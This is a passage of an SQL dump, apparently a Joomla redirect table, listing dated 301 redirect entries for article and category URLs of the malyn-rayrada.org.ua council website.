00:00:00',301),(21367,'http://www.malyn-rayrada.org.ua/index.php?id=58&Itemid=105&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 03:35:00','0000-00-00 00:00:00',301),(21368,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=794:-lr&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:35:03','0000-00-00 00:00:00',301),(21369,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1300:2014-04-25-07-21-54&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 03:35:12','0000-00-00 00:00:00',301),(21370,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=609:-q-q&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:35:18','0000-00-00 00:00:00',301),(21371,'http://www.malyn-rayrada.org.ua/index.php?id=3:2010-06-05-12-50-56&Itemid=7&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-11 03:35:41','0000-00-00 00:00:00',301),(21372,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1084:--qq&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:35:43','0000-00-00 00:00:00',301),(21373,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=609:-q-q&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:35:45','0000-00-00 00:00:00',301),(21374,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:35:52','0000-00-00 00:00:00',301),(21375,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1024:----l---------2011-2014-r-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:35:54','0000-00-00 00:00:00',301),(21376,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:35:56','0000-00-00 00:00:00',301),(21377,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=738:-c-&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:03','0000-00-00 00:00:00',301),(21378,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1095:2013-09-24-13-25-55&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:10','0000-00-00 00:00:00',301),(21379,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=367:-1620-19072011-&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:36:12','0000-00-00 00:00:00',301),(21380,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=328:2011-05-20-16-23-02&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:15','0000-00-00 00:00:00',301),(21381,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1163:2013-12-20-07-44-35&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:20','0000-00-00 00:00:00',301),(21382,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:23','0000-00-00 00:00:00',301),(21383,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1142:-l-r-&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:36','0000-00-00 00:00:00',301),(21384,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1153:-2013-&Itemid=95&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:39','0000-00-00 00:00:00',301),(21385,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=784:-9-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:41','0000-00-00 00:00:00',301),(21386,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1144:-lr&Itemid=95&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:43','0000-00-00 00:00:00',301),(21387,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:46','0000-00-00 00:00:00',301),(21388,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1007:-4-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:48','0000-00-00 00:00:00',301),(21389,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=928:2013-02-21-09-10-17&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:36:55','0000-00-00 00:00:00',301),(21390,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=789:-2012-2014-&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:37:04','0000-00-00 00:00:00',301),(21391,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=411:-2014-&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:37:09','0000-00-00 00:00:00',301),(21392,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=728:2012-06-26-07-51-10&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:37:11','0000-00-00 00:00:00',301),(21393,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=430:14-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:37:23','0000-00-00 00:00:00',301),(21394,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=836:-6732012&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:37:25','0000-00-00 00:00:00',301),(21395,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=463:-2007-2015-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:37:37','0000-00-00 00:00:00',301),(21396,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=718:2012-06-14-15-24-50&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:38:14','0000-00-00 00:00:00',301),(21397,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=430:14-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:38:18','0000-00-00 00:00:00',301),(21398,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=343:-2011-&Itemid=68&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:38:23','0000-00-00 00:00:00',301),(21399,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1179:2014-01-21-12-44-04&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:38:25','0000-00-00 00:00:00',301),(21400,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:38:27','0000-00-00 00:00:00',301),(21401,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=349:--------20--2011--108-l---r&Itemid=68&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:38:33','0000-00-00 00:00:00',301),(21402,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=734:-6-2012-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:38:44','0000-00-00 00:00:00',301),(21403,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1153:-2013-&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:38:47','0000-00-00 00:00:00',301),(21404,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=681:16-13-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:41:48','0000-00-00 00:00:00',301),(21405,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1212:2014-02-07-07-01-38&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:42:04','0000-00-00 00:00:00',301),(21406,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=746:-2012-&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:42:11','0000-00-00 00:00:00',301),(21407,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:42:30','0000-00-00 00:00:00',301),(21408,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1095:2013-09-24-13-25-55&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:42:35','0000-00-00 00:00:00',301),(21409,'http://www.malyn-rayrada.org.ua/index.php?id=54:--29112013-&Itemid=95&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 03:43:07','0000-00-00 00:00:00',301),(21410,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=739:2012-07-23-12-44-57&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:43:09','0000-00-00 00:00:00',301),(21411,'http://www.malyn-rayrada.org.ua/index.php?id=54&Itemid=95&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 03:43:16','0000-00-00 00:00:00',301),(21412,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:43:21','0000-00-00 00:00:00',301),(21413,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&Itemid=&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 03:43:25','0000-00-00 00:00:00',301),(21414,'http://www.malyn-rayrada.org.ua/index.php?id=33:-20052011&Itemid=66&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 03:43:28','0000-00-00 00:00:00',301),(21415,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=523:2011-12-30-10-16-28&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:43:32','0000-00-00 00:00:00',301),(21416,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:43:34','0000-00-00 00:00:00',301),(21417,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=679:2012-05-17-10-00-53&Itemid=80&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:43:47','0000-00-00 00:00:00',301),(21418,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=775:2012-10-02-09-35-53&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:43:52','0000-00-00 00:00:00',301),(21419,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=996:2013-04-25-12-09-57&Itemid=17&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:43:54','0000-00-00 00:00:00',301),(21420,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=480:2011-11-28-10-11-58&Itemid=73&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:43:56','0000-00-00 00:00:00',301),(21421,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1181:2014-01-22-06-06-13&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:43:59','0000-00-00 00:00:00',301),(21422,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:44:08','0000-00-00 00:00:00',301),(21423,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=408:------------------2011-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:44:13','0000-00-00 00:00:00',301),(21424,'http://www.malyn-rayrada.org.ua/index.php?id=31&Itemid=62&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 03:44:20','0000-00-00 00:00:00',301),(21425,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=885:-2013-2015-&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:44:30','0000-00-00 00:00:00',301),(21426,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=702:-2011-2013-&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:44:32','0000-00-00 00:00:00',301),(21427,'http://www.malyn-rayrada.org.ua/index.php?id=53&Itemid=94&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 03:44:39','0000-00-00 00:00:00',301),(21428,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=210:-2010-&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:44:46','0000-00-00 00:00:00',301),(21429,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:44:50','0000-00-00 00:00:00',301),(21430,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1142:-l-r-&Itemid=95&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:00','0000-00-00 00:00:00',301),(21431,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=540:-2010-2015-&Itemid=76&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:11','0000-00-00 00:00:00',301),(21432,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1209:-----2014-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:45:14','0000-00-00 00:00:00',301),(21433,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=836:-6732012&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:16','0000-00-00 00:00:00',301),(21434,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=547:-l-r-2011-2016-&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:18','0000-00-00 00:00:00',301),(21435,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1051:--------4------&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:23','0000-00-00 00:00:00',301),(21436,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=704:-20-2011-108-l-r-&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:37','0000-00-00 00:00:00',301),(21437,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=833:2012-11-30-06-51-18&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:39','0000-00-00 00:00:00',301),(21438,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=634:-2016-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:49','0000-00-00 00:00:00',301),(21439,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=436:------l-r--2007-2011-&Itemid=72&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:45:58','0000-00-00 00:00:00',301),(21440,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=700:-2012-2015-&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:00','0000-00-00 00:00:00',301),(21441,'http://www.malyn-rayrada.org.ua/index.php?id=47&Itemid=86&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:46:03','0000-00-00 00:00:00',301),(21442,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1039:-l-r&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:05','0000-00-00 00:00:00',301),(21443,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=737:2012-07-18-13-36-46&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:07','0000-00-00 00:00:00',301),(21444,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1190:------------2014--&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:25','0000-00-00 00:00:00',301),(21445,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:27','0000-00-00 00:00:00',301),(21446,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=600:2012-03-01-06-12-24&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:33','0000-00-00 00:00:00',301),(21447,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1150:2013-11-28-14-53-17&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:35','0000-00-00 00:00:00',301),(21448,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=792:2012-10-17-06-26-37&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:37','0000-00-00 00:00:00',301),(21449,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:46:42','0000-00-00 00:00:00',301),(21450,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=821:------12--2012--311-l------------r&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:46:58','0000-00-00 00:00:00',301),(21451,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=472:-l-r-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:01','0000-00-00 00:00:00',301),(21452,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:05','0000-00-00 00:00:00',301),(21453,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=610:2012-03-23-06-34-31&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:13','0000-00-00 00:00:00',301),(21454,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=708:-l-r&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:18','0000-00-00 00:00:00',301),(21455,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1202:2014-01-31-07-45-54&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:22','0000-00-00 00:00:00',301),(21456,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:29','0000-00-00 00:00:00',301),(21457,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:31','0000-00-00 00:00:00',301),(21458,'http://www.malyn-rayrada.org.ua/index.php?id=43:--25072012-&Itemid=82&lang=en&layout=blog&limitstart=30&option=com_content&view=category','','','',2,0,'2015-12-11 03:47:34','0000-00-00 00:00:00',301),(21459,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1212:2014-02-07-07-01-38&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:47:36','0000-00-00 00:00:00',301),(21460,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=760:-qq-24-2012-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:38','0000-00-00 00:00:00',301),(21461,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=797:-6-16112010-5-&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:50','0000-00-00 00:00:00',301),(21462,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1112:2013-10-23-09-24-43&Itemid=94&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:55','0000-00-00 00:00:00',301),(21463,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=734:-6-2012-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:57','0000-00-00 00:00:00',301),(21464,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=864:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:47:59','0000-00-00 00:00:00',301),(21465,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1143:2013-11-26-13-23-37&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:48:02','0000-00-00 00:00:00',301),(21466,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1190:------------2014--&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:48:08','0000-00-00 00:00:00',301),(21467,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:48:11','0000-00-00 00:00:00',301),(21468,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=996:2013-04-25-12-09-57&Itemid=17&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:48:15','0000-00-00 00:00:00',301),(21469,'http://www.malyn-rayrada.org.ua/index.php?id=53:--25102013-&Itemid=94&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:48:21','0000-00-00 00:00:00',301),(21470,'http://www.malyn-rayrada.org.ua/index.php?id=53:--25102013-&Itemid=94&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:48:23','0000-00-00 00:00:00',301),(21471,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1138:-15112013&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:48:37','0000-00-00 00:00:00',301),(21472,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=318:-2007-2011&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:48:47','0000-00-00 00:00:00',301),(21473,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1203:-2014-&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:48:51','0000-00-00 00:00:00',301),(21474,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1205:2014-01-31-07-53-03&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:03','0000-00-00 00:00:00',301),(21475,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=823:2012-11-14-16-52-28&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:06','0000-00-00 00:00:00',301),(21476,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-11 03:49:22','0000-00-00 00:00:00',301),(21477,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:25','0000-00-00 00:00:00',301),(21478,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=724:------27042012252&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:27','0000-00-00 00:00:00',301),(21479,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1113:2013-10-23-09-26-07&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:29','0000-00-00 00:00:00',301),(21480,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=696:-14-6-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:49:32','0000-00-00 00:00:00',301),(21481,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1155:2013-12-07-15-56-12&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 03:49:34','0000-00-00 00:00:00',301),(21482,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=872:2012-12-17-18-45-20&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:36','0000-00-00 00:00:00',301),(21483,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=598:2012-02-29-14-13-44&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:49:53','0000-00-00 00:00:00',301),(21484,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:55','0000-00-00 00:00:00',301),(21485,'http://www.malyn-rayrada.org.ua/index.php?catid=52&id=1067:2013-08-16-15-28-50&Itemid=93&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:49:58','0000-00-00 00:00:00',301),(21486,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1212:2014-02-07-07-01-38&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:50:00','0000-00-00 00:00:00',301),(21487,'http://www.malyn-rayrada.org.ua/index.php?id=2&Itemid=32&lang=en&option=com_phocagallery&view=category','','','',2,0,'2015-12-11 03:50:02','0000-00-00 00:00:00',301),(21488,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1146:2013-11-27-10-09-00&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:50:04','0000-00-00 00:00:00',301),(21489,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=879:2012-12-21-17-02-01&Itemid=85&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:50:07','0000-00-00 00:00:00',301),(21490,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=272:-2010-&Itemid=62&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:50:09','0000-00-00 00:00:00',301),(21491,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1081:-2013-2017-&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:50:14','0000-00-00 00:00:00',301),(21492,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:50:16','0000-00-00 00:00:00',301),(21493,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=444:2011-10-24-07-04-45&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:50:30','0000-00-00 00:00:00',301),(21494,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',3,0,'2015-12-11 03:50:32','0000-00-00 00:00:00',301),(21495,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1001:2013-04-30-12-14-17&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:50:40','0000-00-00 00:00:00',301),(21496,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=836:-6732012&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:50:42','0000-00-00 00:00:00',301),(21497,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:50:44','0000-00-00 00:00:00',301),(21498,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=707:-231-280312-l-2012-r&Itemid=82&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:50:47','0000-00-00 00:00:00',301),(21499,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1310:2014-05-06-14-07-43&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:50:49','0000-00-00 00:00:00',301),(21500,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=582:2012-02-27-13-18-37&Itemid=77&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:50:51','0000-00-00 00:00:00',301),(21501,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=273:-2011-&Itemid=62&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:51:01','0000-00-00 00:00:00',301),(21502,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1014:2013-06-03-06-43-44&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:51:03','0000-00-00 00:00:00',301),(21503,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:51:08','0000-00-00 00:00:00',301),(21504,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=347:2011-06-15-12-33-18&Itemid=68&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:51:10','0000-00-00 00:00:00',301),(21505,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:51:12','0000-00-00 00:00:00',301),(21506,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=561:2012-02-02-08-58-39&Itemid=76&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:51:17','0000-00-00 